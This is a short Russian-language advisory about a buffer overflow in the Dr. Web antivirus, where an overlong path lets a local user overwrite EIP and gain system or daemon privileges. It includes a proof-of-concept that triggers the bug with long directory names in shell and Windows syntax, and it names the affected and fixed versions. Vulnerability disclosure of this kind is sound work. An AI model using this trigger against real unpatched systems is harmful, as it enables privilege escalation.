Переполнение буфера обнаружено в антивирусе
Dr. WEB. Уязвимость позволяет пользователю с доступом к серверу получить root привилегии на уязвимой системе.
Путь, длиннее 256 символов приведет к переполнению буфера в службе и мониторе Dr. WEB. Уязвимость позволяет перезаписать EIP регистр и выполнить произвольный код с системными привилегиями (windows) и с привилегиями Dr. Web демона (UNIX).
Пример:
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
или:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
Уязвимость обнаружена в Dr Web 4.28 и более ранних версиях и устранена в Dr Web Version 4.29b и выше.
